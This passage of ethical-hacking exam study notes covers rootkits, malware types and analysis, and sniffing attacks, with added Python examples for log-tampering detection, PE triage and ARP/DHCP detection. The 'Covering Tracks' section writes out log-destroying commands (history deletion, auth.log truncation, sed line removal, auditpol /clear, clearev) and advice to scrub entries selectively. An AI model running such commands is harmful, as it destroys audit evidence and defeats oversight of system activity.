- **Steganography** - practice of concealing a message inside another medium so that only the sender and recipient know of its existence
- **Ways to Identify**
    - Text - character positions are key - blank spaces, text patterns
    - Image - file larger in size; some may have color palette faults
    - Audio & Video - require statistical analysis
- **Methods**
    - Least significant bit insertion - changes the least meaningful bit of each pixel or sample, which is invisible to the eye but shows up statistically
    - Masking and filtering (grayscale images) - like watermarking
    - Algorithmic transformation -
hides in the mathematical functions used in image compression (e.g. the DCT coefficients of a JPEG)
- **Tools**
    - QuickStego
    - gifshuffle
    - SNOW
    - Steganography Studio
    - OpenStego


## Rootkits

- Software put in place by an attacker to obscure system compromise
- Hides processes and files
- Also allows for future access
- **Examples**
    - Horsepill - Linux kernel rootkit inside initrd
    - GrayFish - Windows rootkit that injects into the boot record
    - Firefef - multi-component family of malware
    - Azazel
    - Avatar
    - Necurs
    - ZeroAccess
- **Hypervisor level** - rootkits that modify the boot sequence of a host system to load a VM as the host OS
- **Hardware** - hide malware in devices or firmware
- **Boot loader level** - replace the boot loader with one controlled by the hacker
- **Application level** - directed to replace valid application files with Trojans
- **Kernel level** - attack boot sectors and the kernel, replacing kernel code with back-door code; most dangerous
- **Library level** - use system-level calls to hide themselves
- One way to detect rootkits is to map all the files on a system, then boot from a clean CD and compare the two file systems; a rootkit can lie to tools running on the live system, but not to an offline view of the disk

## Covering Tracks

**Clearing logs is the main idea behind covering tracks.**
1. Find and clear the logs.
2. Falsify/Modify logs.

### **On Linux:**
- Linux keeps the **command line history in the `.bash_history`** file
- To clear the command line history, `rm -rf ~/.bash_history` removes the file (its blocks stay on disk until reused). `shred -zu ~/.bash_history` overwrites the file's blocks on disk before unlinking it, which is ineffective on journaling or copy-on-write filesystems and on SSDs.
- `history -c` clears the current session's in-memory history only; because the shell rewrites the file from memory on exit, `history -c && history -w` truncates the file. `history -w` on its own writes the current session's history out to the file.
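The Linux log-clearing and log-editing techniques of this section, plus the defender's check that catches the selective one, as an added example that is not from the original notes, run against a constructed in-memory `auth.log` rather than `/var/log`: `scrub` is the `sed -i '/pattern/d'` equivalent, `wipe` is `cat /dev/null > file`, and `unpaired_sessions` is the check that notices when the "session opened" lines are gone but their "session closed" partners are still there.

```python
import re
from collections import Counter
from typing import List

# Constructed sample of /var/log/auth.log (not a real capture)
AUTH_LOG = """\
Jan 10 10:00:01 host sshd[900]: Accepted password for kali from 10.0.0.5 port 51000 ssh2
Jan 10 10:00:01 host sshd[900]: pam_unix(sshd:session): session opened for user kali by (uid=0)
Jan 10 10:05:12 host sudo:     kali : TTY=pts/0 ; PWD=/home/kali ; COMMAND=/bin/cat /etc/shadow
Jan 10 10:07:40 host sshd[900]: pam_unix(sshd:session): session closed for user kali
Jan 10 10:09:00 host CRON[950]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan 10 10:09:01 host CRON[950]: pam_unix(cron:session): session closed for user root
"""


def scrub(log: str, pattern: str) -> str:
    """Equivalent of `sed -i '/pattern/d' file`: drop every line matching the regex, keep everything else."""
    return "".join(line for line in log.splitlines(keepends=True) if not re.search(pattern, line))


def wipe(log: str) -> str:
    """Equivalent of `cat /dev/null > file` (or `: > file`): a zero-byte log, which is itself a loud indicator."""
    return ""


def unpaired_sessions(log: str) -> List[str]:
    """Defender's check: every PAM 'session closed' must follow a 'session opened' for the same user.
    Scrubbing only the 'opened' lines leaves orphaned 'closed' lines, which this returns."""
    opened = Counter()
    orphans = []
    for line in log.splitlines():
        m = re.search(r"session (opened|closed) for user (\S+)", line)
        if not m:
            continue
        state, user = m.groups()
        if state == "opened":
            opened[user] += 1
        elif opened[user] > 0:
            opened[user] -= 1
        else:
            orphans.append(user)
    return orphans


if __name__ == "__main__":
    keyword_scrub = scrub(AUTH_LOG, "opened")          # the page's sed example: removes both users' 'opened' lines
    actor_scrub = scrub(AUTH_LOG, r"\bkali\b")         # selective: remove only the intruder's own entries
    print("orphans after keyword scrub:", unpaired_sessions(keyword_scrub))
    print("orphans after actor scrub:", unpaired_sessions(actor_scrub))
    print("bytes after wipe:", len(wipe(AUTH_LOG)))
```

Scrubbing by actor leaves the log internally consistent, which is why "be selective" is the better option later in this section; neither technique helps once the same lines have already been forwarded to a remote syslog server or SIEM.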

- **Turn off the command logs:**
    - `export HISTSIZE=0`
    - `echo $HISTSIZE` will return 0, limiting the number of commands which can be saved in $HISTFILE. `unset HISTFILE` has the same effect for the rest of the session.

- **clearev** - Meterpreter shell command to clear the Windows event logs (issued inside Metasploit Framework)

**Most common logs on Linux:**

- `/var/log/messages` or `/var/log/syslog`
    - General messages, as well as system-related information.
- `/var/log/auth.log` or `/var/log/secure`
    - Authentication logs, including both successful and failed logins and authentication methods.
- `/var/log/boot.log`
    - Related to booting and any messages logged during startup.
- `/var/log/maillog` or `/var/log/mail.log`
    - All logs related to mail servers.
- `/var/log/wtmp`, `/var/log/btmp` and `/var/run/utmp`
    - Binary login records read by `last`, `lastb` and `who`; editing the text logs does not touch them.
- **Clearing and Modifying logs on Linux**:
    - Truncate the file (a zero-byte `auth.log` is itself an obvious sign of tampering):
        - `echo " " > /var/log/auth.log`
    - Or with the 'black hole' `/dev/null`; note the direction of the redirect, `echo /dev/null > auth.log` would just write the string "/dev/null" into the log:
        - `cat /dev/null > /var/log/auth.log`
    - To tamper with/modify the log files, use the `sed` stream editor to delete, replace and insert data; this is quieter because the file keeps its size and the other entries.
        - `sed -i '/opened/d' /var/log/auth.log` - deletes every line containing the word '**opened**', i.e. the "session opened" entries on a Linux system.
    - Entries already forwarded to a remote syslog server or SIEM are out of reach of all of the above, which is the main defensive countermeasure.

### **On Windows:**
- To clear all **command line history**:
    - On **Cmd Prompt**: press [`alt`] + [`F7`]
    - On **PowerShell**: `Clear-History` clears the session buffer; PSReadLine also keeps `ConsoleHost_history.txt` on disk, which must be removed separately

In Windows, you need to clear the **Application**, **System** and **Security** logs.

- **Auditpol** changes the audit policy, i.e. which events get logged in the first place.
    - Main commands:
        - `auditpol /get /category:*` --> display all audit policies in detail and whether each is enabled *(Object Access, System, Logon/Logoff, Privilege Use, and so on).*
        - `auditpol /clear` --> reset (disable) the system audit policy for all subcategories.
        - `auditpol /remove` --> Removes all per-user audit policy settings and disables all system audit policy settings.

> ⚡︎ **Check out the [practical lab on Auditpol](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/11-Auditpol.md)**
- **MRU** (Most Recently Used) lists - Windows records recently used programs and files and saves them in the Registry.

- **It is possible to manually clear the logs in Event Viewer** (clearing the Security log writes Event ID 1102 "The audit log was cleared", so the act itself is logged).

### Conclusion on Covering Tracks

- One option is to corrupt a log file - this happens all the time and draws less attention than an empty one
- The best option is to be selective and delete only the entries pertaining to your actions.

- **Can also disable auditing ahead of time to prevent logs from being captured**

- Tools:
    - CCleaner --> automates system cleaning, scrubs online history, log files, etc. [Windows]
    - MRUblaster [Windows]
    - Meterpreter in MSF has **clearev** to clear all event logs remotely. [Kali Linux using MSF]
-------------------------------------------------------------------------------- /7-Malware.md: --------------------------------------------------------------------------------
# Malware

> ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/6-Malware)**

### - **What is Malware?**
*Any software intentionally designed to cause damage to a computer, server or computer network. The code is described as computer viruses, worms, Trojan horses, ransomware, spyware, adware, and scareware, among other terms. Malware has malicious intent, acting against the interest of the computer user.*

## Types of Viruses and Worms 🐛
* **How it works?**
    1. Infection Phase - a virus is planted on a target system, replicates itself and attaches to one or more executable files
    2.
Attack phase - the infected file is executed accidentally by the user, or in some way is deployed and activated

- **Virus** - Designed to spread from host to host and has the ability to replicate itself. It cannot reproduce/spread without help. It operates by inserting or attaching itself to a legitimate program or document in order to execute its code.

- **Macro Virus** - Written in a macro language (e.g.: VBA) and therefore platform independent; it runs when the document's macros are enabled.

- **Compression Virus** - Appends itself to executables on the system and compresses them, acting with the user's permissions.

- **Stealth Virus** - Hides the modifications it has made; tricks antivirus software by intercepting its requests to the OS and providing false information.

- **Polymorphic Virus** - Produces varied but operational copies of itself. A polymorphic virus may have no parts that remain identical between infections, making it very hard to detect using signatures.

- **Multipartite Virus** - Attempts to infect both the boot sector and files; generally refers to viruses with multiple infection methods

- **Self-garbling (metamorphic) virus** - Rewrites itself every time it infects a new file.

- **Other Virus Types**
    - **Boot Sector Virus** - known as a system virus; moves the boot sector to another location and then inserts its own code in the original location
    - **Shell Virus** - wraps around an application's code, inserting itself before the application's
    - **Cluster Virus** - modifies directory table entries so every time a file or folder is opened, the virus runs
    - **Encryption Virus** - uses encryption to hide its code from antivirus
    - **Cavity Virus** - overwrites unused (null content) sections of host files so as not to increase the file's size
    - **Sparse Infector Virus** - only infects occasionally (e.g.
every 10th time) 34 | - **File Extension Virus** - changes the file extensions of files to take advantage of most people having them turned off (readme.txt.vbs shows as readme.txt) 35 | 36 | - **Virus Makers** 37 | - Sonic Bat 38 | - PoisonVirus Maker 39 | - Sam's Virus Generator 40 | - JPS Virus Maker 41 | 42 | - **Worm** - self-replicating malware that sends itself to other computers without human intervention 43 | - Usually doesn't infect files - just resides in active memory 44 | - Often used in botnets 45 | 46 | - **Ghost Eye Worm** - hacking tool that uses random messaging on Facebook and other sites to perform a host of malicious efforts. 47 | 48 | - **Logic Bomb** - Executes a program when a certain event happens or a date and time arrives. 49 | 50 | - **Rootkit** - Set of malicious tools that are loaded on a compromised system through stealthy techniques; Very hard to detect; 51 | 52 | - **Ransomware** - malicious software designed to deny access to a computer until a price is paid; usually spread through email 53 | - **WannaCry** - famous ransomware; within 24 hours had 230,000 victims; exploited unpatched SMB vulnerability 54 | - **Other Examples** 55 | - Cryptorbit 56 | - CryptoLocker 57 | - CryptoDefense 58 | - police-themed 59 | 60 | - **Trojan horse** - A program that is disguised as another legitimate program with the goal of carrying out malicious activities in the background without user's knowledge. 61 | - **RAT - Remote Access Trojans** - Malicious programs that run on systems and allow intruders to access and use a system remotely. 62 | 63 | - **Immunizer** - Attaches code to a file or application, which would fool a virus into 'thinking' it was already infected. (e.g: like human vaccine). 64 | 65 | - **Behavior blocking** - Allowing the suspicious code to execute within the OS and watches its interactions looking for suspicious activities. 
> **⚠️ - Viruses need help/interaction to propagate; worms self-propagate**

### Major characteristics of viruses:
1. Infecting other files
2. Alteration of data
3. Transforms itself
4. Corruption of files and data
5. Encrypts itself
6. Self-replication

### Stages of Virus Lifecycle:
1. Design
2. Replication
3. Launch
4. Detection
5. Incorporation - A.V. figures out the virus pattern & builds signatures to identify and eliminate the virus
6. Execution of the damage routine - A.V. to the rescue

## Malware Basics
* **How is malware distributed?**
  - SEO manipulation
  - Social Engineering / Click-jacking
  - Phishing
  - Malvertising
  - Compromising legitimate sites
  - Drive-by downloads
  - Spam

- **Malware** - software designed to harm or secretly access a computer system without informed consent
  - Most is downloaded from the Internet with or without the user's knowledge

- **Overt Channels** - legitimate communication channels used by programs

- **Covert Channels** - used to transport data in unintended ways

- **Wrappers** - programs that allow you to bind an executable to an innocent file

### **Basic components of Malware**
1. **Crypters** - use a combination of encryption and code manipulation to render malware undetectable to security programs; protects it from being scanned or found during analysis.
2. **Downloader** - Used to download additional malware.
3. **Dropper** - Used to install additional malware into the target system.
4. **Exploit** - Malicious code used to execute on a specific vulnerability.
5. **Injector** - Used to expose vulnerable processes in the target system to the exploit.
6. **Obfuscator** - Used to conceal the true purpose of the malware.
7. **Packers** - Used to bundle all of the malware files together into a single executable.
8. **Payload** - Used to take over the target machine.
9. **Malicious Code** - Used to define the abilities of the malware.

**Exploit Kits** - help deliver exploits and payloads
- Infinity
- Bleeding Life
- Crimepack
- Blackhole Exploit Kit

## Trojans 🐴

- Software that appears to perform a desirable function but instead performs malicious activity
- To hackers, it is a method to gain and maintain access to a system
- Trojans are a means of delivery, whereas a backdoor provides the open access
- Trojans are typically spread through **Social Engineering**.

- **Types of Trojans:**
  - **Defacement trojan**
  - **Proxy server trojan**
  - **Botnet trojan**
    - Chewbacca
    - Skynet
  - **Remote access trojans**
    - RAT
    - MoSucker
    - Optix Pro
    - Blackhole
  - **E-banking trojans**
    - Zeus
    - Spyeye
  - **IoT Trojans**
  - **Security Software Disable Trojans**
  - **Command Shell Trojan** - Provides a backdoor to connect to through command-line access
    - Netcat
  - **Covert Channel Tunneling Trojan** (CCTT) - a RAT trojan; creates data transfer channels in previously authorized data streams

### Infection Process:
1. Creation of a Trojan using a Trojan Construction Kit
2. Create a Dropper
   - Used to install additional malware into the target system.
3. Create a Wrapper
   - Wrappers - programs that allow you to bind an executable to an innocent file
4. Propagate the Trojan
5. Execute the Dropper

### **Trojan Port Numbers**:

| Trojan Name | TCP Port |
|-------------|----------|
| Death | 2 |
| Senna Spy | 20 |
| Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash | 21 |
| Shaft | 22 |
| Executor | 80 |
| Hackers Paradise | 31,456 |
| TCP Wrappers | 421 |
| Ini-Killer | 555 |
| Doom, Santaz Back | 666 |
| Silencer, WebEx | 1001 |
| DolyTrojan | 1011 |
| RAT | 1095-98 |
| SubSeven | 1243 |
| Shiva-Burka | 1600 |
| Trojan Cow | 2001 |
| Deep Throat | 6670-71 |
| Tini | 7777 |
| Dumaru.Y | 10000 |
| SubSeven 1.0-1.8, MyDoom.B | 10080 |
| VooDoo Doll, NetBus 1.x, GabanBus, Pie Bill Gates, X-Bill | 12345 |
| Whack a Mole | 12361-3 |
| NetBus | 17300 |
| Back Orifice | 31337,8 |
| SubSeven, PhatBot, AgoBot, Gaobot | 65506 |

> **⚠️ - It's not necessary to know every trojan port in history for the CEH exam, but it's good for understanding.**

### **Trojan Countermeasures**
1. Avoid clicking on unusual or suspect email attachments
2. Block unused ports
3. Monitor network traffic
4. Avoid downloading from untrusted sources
5. Install & update anti-virus software
6. Scan removable media before use
7. Validate file integrity of all externally sourced software
8. Enable auditing
9. Configure host-based firewalls
10. Use IDS

### Techniques
- **`netstat -an`** - shows open ports in numerical order
- **`netstat -b`** - displays all active connections and the processes using them
- **Process Explorer** - Microsoft tool that shows you everything about running processes
- **Registry Monitoring Tools**
  - SysAnalyzer
  - Tiny Watcher
  - Active Registry Monitor
  - Regshot
- **Msconfig** - Windows program that shows all programs set to run on startup
- **Tripwire** - integrity verifier that can act as a HIDS in protection against trojans
- **SIGVERIF** - built into Windows to verify the integrity of the system
  - Log file can be found at `c:\windows\system32\sigverif.txt`
  - Look for drivers that are not signed

## Malware Analysis
*Malware analysis is the study or process of determining the functionality, origin and potential impact of a given malware sample such as a virus, worm, trojan horse, rootkit, or backdoor.*

### **Types of Malware analysis:**
1. **Static (Code Analysis)** - performed by fragmenting the binary file into individual elements that can be analyzed without executing them.
   - File fingerprinting
   - Local & online scanning of elements to see if they match known malware profiles
   - String searching
   - Identifying packers/obfuscators used
   - Identifying the PE's (portable executable) information
   - Identifying dependencies
   - Malware disassembly

2. **Dynamic (Behavioral Analysis)** - performed by executing the malware to see what effect it has on the system.
   - System baselining
   - Host integrity monitoring
   - **Tools for Disassembling | Debugging | Reverse Engineering:**
     - IDA Pro
     - OllyDbg
     - Ghidra by NSA

- **Sheepdip** - Dedicated computer which is used to test files on removable media for viruses before they are allowed to be used with other computers.
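The static-analysis items listed above (file fingerprinting, string searching, identifying packers, reading the PE information) carried out in one script, as an added example that is not part of the original notes and not code from any tool they name. The sample bytes are a constructed, minimal PE-shaped blob rather than a real executable, the string `http://c2.example.invalid/beacon` is a constructed indicator, and the function names are this example's own. UPX's default section names (`UPX0`, `UPX1`, `UPX2`) are used as the packer hint because the notes mention UPX as a tool for looking at binaries.

```python
"""Static triage of a suspicious binary: fingerprint, strings, PE header, packer hint.

Added example (not from the original notes). build_sample() returns a constructed,
minimal PE-shaped blob, not real malware; the helper names are this example's own.
"""
import hashlib
import re
import struct

# UPX's default section names: seeing them is a strong (not conclusive) packer indicator
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}


def build_sample() -> bytes:
    """Constructed sample: 64-byte DOS header ('MZ', e_lfanew at 0x3C), the PE
    signature, a COFF header for x86-64 with two sections and no optional header,
    two UPX-named section headers, then a short 'body' holding strings an analyst
    would want to see. Not a runnable executable."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE header right after DOS header
    coff = struct.pack(
        "<HHIIIHH",
        0x8664,      # Machine: IMAGE_FILE_MACHINE_AMD64
        2,           # NumberOfSections
        0x5F3E1A00,  # TimeDateStamp (constructed)
        0, 0,        # PointerToSymbolTable, NumberOfSymbols
        0,           # SizeOfOptionalHeader (omitted in this toy)
        0x0022,      # Characteristics: EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    )

    def section_header(name: bytes) -> bytes:
        # IMAGE_SECTION_HEADER: 8-byte name + 6 DWORDs + 2 WORDs + 1 DWORD = 40 bytes
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", *([0] * 9))

    body = (b"\0" * 8
            + b"http://c2.example.invalid/beacon\0"   # constructed indicator, not a real host
            + b"\xff\x01"
            + b"CreateRemoteThread\0")               # API name typical of injection code
    return bytes(dos) + b"PE\0\0" + coff + section_header(b"UPX0") + section_header(b"UPX1") + body


def fingerprint(data: bytes) -> dict:
    """File fingerprinting: hashes to look up against known-malware databases."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
    }


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """String searching: runs of printable ASCII at least min_len characters long."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def parse_pe(data: bytes) -> dict:
    """PE information: validate MZ/PE signatures, read the COFF header and section names."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE executable (missing MZ)")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    sect_off = pe_off + 4 + 20 + opt_size          # section table follows the optional header
    names = []
    for i in range(nsections):
        raw = data[sect_off + 40 * i: sect_off + 40 * i + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return {"machine": machine, "sections": names, "timestamp": timestamp, "characteristics": chars}


def packer_hint(pe_info: dict) -> bool:
    """Identifying packers: UPX-named sections mean the real code is still compressed."""
    return any(name in UPX_SECTION_NAMES for name in pe_info["sections"])


def triage(data: bytes) -> dict:
    """Run the static steps in order and collect one report dict."""
    pe = parse_pe(data)
    return {"fingerprint": fingerprint(data), "pe": pe, "packed": packer_hint(pe),
            "strings": extract_strings(data)}


if __name__ == "__main__":
    report = triage(build_sample())
    print("sha256:", report["fingerprint"]["sha256"])
    print("machine: 0x%04x sections: %s packed: %s" % (report["pe"]["machine"], report["pe"]["sections"], report["packed"]))
    for s in report["strings"]:
        print("string:", s)
```

Run against a real file by replacing `build_sample()` with `open(path, "rb").read()`; a packed result means the strings and imports you see belong to the unpacker stub, which is why the notes list unpacking (UPX) before disassembly.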
### **Steps**
1. Make sure you have a good test bed
   - Use a VM with the NIC in host-only mode and no open shares
2. Analyze the malware on the isolated VM in a static state
   - Tools - binText and UPX help with looking at the binary
3. Run the malware and check out processes
   - Use Process Monitor, etc. to look at processes
   - Use NetResident, TCPview or even Wireshark to look at network activity
4. Check and see what files were added, changed, or deleted
   - Tools - IDA Pro, VirusTotal, Anubis, Threat Analyzer

- **Preventing Malware**
  - Make sure you know what is going on in your system
  - Have a good antivirus that is up to date
  - Airgapped - isolated on the network

## Rootkits

- Software put in place by an attacker to obscure system compromise
- Hides processes and files
- Also allows for future access
- **Examples**
  - Horsepill - Linux kernel rootkit inside initrd
  - Grayfish - Windows rootkit that injects into the boot record
  - Firefef - multi-component family of malware
  - Azazel
  - Avatar
  - Necurs
  - ZeroAccess
- **Hypervisor level** - rootkits that modify the boot sequence of a host system to load a VM as the host OS
- **Hardware** - hide malware in devices or firmware
- **Boot loader level** - replace the boot loader with one controlled by the hacker
- **Application level** - directed to replace valid application files with Trojans
- **Kernel level** - attack boot sectors and the kernel, replacing kernel code with back-door code; most dangerous
- **Library level** - use system-level calls to hide themselves
- One way to detect rootkits is to map all the files on a system, then boot the system from a clean CD version and compare the two file systems

--------------------------------------------------------------------------------
/8-Sniffing.md:
--------------------------------------------------------------------------------

# Sniffing

> ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/7-Sniffing)**

*Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. It is a form of "tapping phone wires" to get to know about the conversation. It is also called wiretapping applied to computer networks.*

## Active and Passive Sniffing

- **Passive sniffing** - watching network traffic without interaction; only works within the same collision domain
- **Active sniffing** - uses methods to make a switch send traffic to you even though it isn't destined for your machine
- **Span port** - switch configuration that makes the switch send a copy of all frames from other ports to a specific port
  - Not all switches have the ability to do this
  - Modern switches sometimes don't allow span ports to send data - you can only listen
- **Network tap** - special port on a switch that allows the connected device to see all traffic
  - ![net-tap](https://i1.wp.com/ipwithease.com/wp-content/uploads/2014/06/NETWORK-TAP.jpg?resize=768%2C429&ssl=1)
- **Port mirroring** - another word for span port

## Basics

- Sniffing is capturing packets as they pass on the wire to review them for interesting information
- **MAC** (Media Access Control) - physical or burned-in address - assigned to a NIC for communications at the Data Link layer
  - 48 bits long
  - Displayed as 12 hex characters separated by colons
  - First half of the address is the **organizationally unique identifier** - identifies the manufacturer
  - Second half ensures no two cards on a subnet will have the same address
- NICs normally only process signals meant for them
- **Promiscuous mode** - NIC must be in this setting to look at all frames passing on the wire
- **CSMA/CD** - Carrier Sense Multiple Access/Collision Detection - used over Ethernet to decide who can talk
- **Collision Domains**
  - Traffic from your NIC (regardless of mode) can only be seen within the same collision domain
  - Hubs by default have one collision domain
  - Switches have a collision domain for each port

## Protocols Susceptible
*Some of the protocols that are vulnerable to sniffing attacks.*

- **IMAP**, **POP3**, **NNTP** and **HTTP** all send data in clear text
- **SMTP** is sent in plain text and is viewable over the wire. SMTP v3 limits the information you can get, but you can still see it.
- **FTP** sends user ID and password in clear text
- **TFTP** passes everything in clear text
- **TCP** shows sequence numbers (usable in session hijacking)
- **TCP** and **UDP** show open ports
- **IP** shows source and destination addresses

## ARP

- Stands for Address Resolution Protocol
- Resolves an IP address to a MAC address
- Packets are ARP_REQUEST and ARP_REPLY
- Each computer maintains its own ARP cache, which can be poisoned
- **Commands**
  - **`arp -a`** displays the current ARP cache
  - **`arp -d *`** clears the ARP cache
- Works on a broadcast basis - both requests and replies are broadcast to everyone
- **Gratuitous ARP** - special packet to update the ARP cache even without a request
  - This is used to poison the cache on other machines

## IPv6

- Uses 128-bit addresses
- Has eight groups of four hexadecimal digits
- Sections with all 0s can be shortened to nothing (just the start and end colons remain)
- The double colon can only be used once
- Loopback address is ::1

| IPv6 Address Type | Description |
| ----------------- | ----------------------------------------------------- |
| Unicast | Addressed and intended for one host interface |
| Multicast | Addressed for multiple host interfaces |
| Anycast | Large number of hosts can receive; nearest host opens |

| IPv6 Scopes | Description |
| ----------- | ------------------------------------------------------------ |
| Link local | Applies only to hosts on the same subnet (address block fe80::/10) |
| Site local | Applies to hosts within the same organization (address block FEC0::/10) |
| Global | Includes everything |

- Scope applies to multicast and anycast
- Traditional network scanning is **computationally less feasible**

## Wiretapping
*Wiretapping, also known as telephone tapping, is the process of monitoring telephone and Internet conversations by a third party, often by covert means.*

- **Lawful interception** - Legally intercepting communications between two parties
- **Active** - Interjecting something into the communication
- **Passive** - Only monitors and records the data
- **PRISM** - System used by the NSA to wiretap external data coming into the US

## MAC Flooding

- Switches either flood or forward data
- If a switch doesn't know what MAC address is on a port, it will flood the data until it finds out
- **CAM Table** - the table on a switch that stores which MAC address is on which port
  - If the table is empty or full, everything is sent to all ports

- MAC Flooding will often destroy the switch before you get anything useful, doesn't last long and will get you noticed. Also, most modern switches protect against this.

- **CAM Table Overflow Attack** - Occurs when an attacker connects to one or more switch ports and then runs a tool that mimics the existence of thousands of random MAC addresses on those switch ports. The switch enters these into the CAM table, and eventually the CAM table fills to capacity. *(This works by sending so many MAC addresses to the CAM table that it can't keep up).* **This attack can be performed by using macof.**
  - ![macof](https://i0.wp.com/kalilinuxtutorials.com/wp-content/uploads/2015/09/macof2.png)

- **Tools for MAC flooding**
  - Etherflood
  - Macof
  - Dsniff

## Switch port stealing
Tries to update the information regarding a specific port in a race condition
1. ARP Flood
   - Source MAC address same as the victim's
   - Destination MAC is the attacker's
   - CAM updates port info (stolen)
2. Attacker now intercepts victim traffic
3. Attacker stops flooding
4. Victim reclaims port
5. Attacker retransmits captured data
6. Attacker repeats flooding

## ARP Poisoning
![arp](https://upload.wikimedia.org/wikipedia/commons/thumb/3/33/ARP_Spoofing.svg/1200px-ARP_Spoofing.svg.png)
***ARP spoofing** is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network.*

- **Also called ARP spoofing or gratuitous ARP**
- This can trigger alerts because of the constant need to keep updating the ARP cache of machines
- Changes the cache of machines so that packets are sent to you instead of the intended target
- **Countermeasures**
  - Dynamic ARP Inspection using DHCP snooping
  - Can use a static ARP ACL to map addresses
  - Header to Payload validation
  - XArp software can also watch for this
  - Default gateway MAC can also be added permanently into each machine's cache
- **Tools for ARP Poisoning**
  - Cain and Abel
  - WinArpAttacker
  - Ufasoft
  - dsniff

## DHCP Starvation
*An attack that targets DHCP servers whereby forged DHCP requests are crafted by an attacker with the intent of exhausting all available IP addresses that can be allocated by the DHCP server.*

- Attempt to exhaust all available addresses from the server
- Attacker sends so many requests that the allocated address space is exhausted
- DHCPv4 packets - `DHCPDISCOVER`, `DHCPOFFER`, `DHCPREQUEST`, `DHCPACK`
- DHCPv6 packets - Solicit, Advertise, Request (Confirm/Renew), Reply
- **DHCP Steps**
  1. Client sends `DHCPDISCOVER`
  2. Server responds with `DHCPOFFER`
  3. Client sends a request for the IP with `DHCPREQUEST`
  4. Server sends address and config via `DHCPACK`
- **Tools**
  - Yersinia
  - DHCPstarv
- Mitigation is to configure DHCP snooping
- **Rogue DHCP Server** - set up to offer addresses instead of the real server. Can be combined with starvation of the real server.

## Spoofing

- **MAC Spoofing** - Changes your MAC address. Benefit is that the CAM table uses the most recent address.
  - Port security can slow this down, but doesn't always stop it.
  - MAC Spoofing makes the switch send all packets to your address instead of the intended one until the CAM table is updated with the real address again.

- **IRDP Spoofing** - Attacker sends ICMP Router Discovery Protocol messages advertising a malicious gateway.

- **DNS Poisoning** - Changes where machines get their DNS info from, allowing the attacker to redirect to malicious websites.

## Sniffing Tools

### **Wireshark**
*Wireshark is the world's foremost and widely-used network protocol analyzer. It lets you see what's happening on your network at a microscopic level.*
- With Wireshark you can inspect and detect ARP poisonings, rogue DHCP servers, broadcast storms, etc.
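The two detections the notes point at from the defender's side, the "Dynamic ARP Inspection using DHCP snooping" countermeasure for ARP poisoning and the "DHCP snooping" mitigation for starvation, reduced to the checks a switch or a passive monitor actually performs, as an added example that is not part of the original notes and not code from any tool they list. The event records, addresses, switch port names and thresholds are constructed for illustration; `TRUSTED_BINDINGS` stands in for the IP-to-MAC table that DHCP snooping builds from completed `DHCPDISCOVER`/`DHCPOFFER`/`DHCPREQUEST`/`DHCPACK` exchanges, and the function names are this example's own.

```python
"""ARP poisoning and DHCP starvation detection over a constructed LAN trace.

Added example, not from the original notes. Addresses, ports and events are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ArpReply:
    ts: float          # seconds since capture start
    sender_ip: str     # IP the reply claims to own
    sender_mac: str    # MAC it wants cached for that IP
    port: str          # switch port the frame arrived on


@dataclass(frozen=True)
class DhcpMsg:
    ts: float
    kind: str          # DHCPDISCOVER / DHCPOFFER / DHCPREQUEST / DHCPACK
    client_mac: str
    port: str


# Trusted IP -> MAC bindings, the way a DHCP snooping table records them after a
# completed DISCOVER/OFFER/REQUEST/ACK exchange (constructed values).
TRUSTED_BINDINGS: Dict[str, str] = {
    "10.0.0.1": "00:11:22:33:44:01",    # default gateway
    "10.0.0.50": "00:11:22:33:44:50",
}


def check_arp_replies(replies: List[ArpReply], bindings: Dict[str, str]) -> List[str]:
    """Dynamic-ARP-Inspection style check: a reply whose sender IP is bound to a
    different MAC is flagged, and so is any IP claimed by more than one MAC."""
    alerts = []
    claimed = defaultdict(set)
    for r in replies:
        claimed[r.sender_ip].add(r.sender_mac.lower())
        expected = bindings.get(r.sender_ip)
        if expected and expected.lower() != r.sender_mac.lower():
            alerts.append(f"{r.ts:.1f}s port {r.port}: {r.sender_ip} claimed by "
                          f"{r.sender_mac}, binding says {expected}")
    for ip, macs in claimed.items():
        if len(macs) > 1:
            alerts.append(f"{ip} mapped to {len(macs)} MACs in trace: {sorted(macs)}")
    return alerts


def detect_dhcp_starvation(msgs: List[DhcpMsg], window: float = 10.0, max_clients: int = 5) -> List[str]:
    """Per switch port, count distinct client MACs that sent DHCPDISCOVER inside a
    sliding time window. An access port serves a handful of hosts, so many new
    MACs asking for leases within seconds is the pattern of a starvation tool."""
    alerts = []
    recent = defaultdict(list)     # port -> [(ts, mac)] still inside the window
    for m in sorted(msgs, key=lambda x: x.ts):
        if m.kind != "DHCPDISCOVER":
            continue
        hist = recent[m.port]
        hist.append((m.ts, m.client_mac))
        while hist and hist[0][0] < m.ts - window:
            hist.pop(0)
        distinct = {mac for _, mac in hist}
        if len(distinct) > max_clients:
            alerts.append(f"{m.ts:.1f}s port {m.port}: {len(distinct)} distinct MACs sent "
                          f"DHCPDISCOVER within {window:.0f}s")
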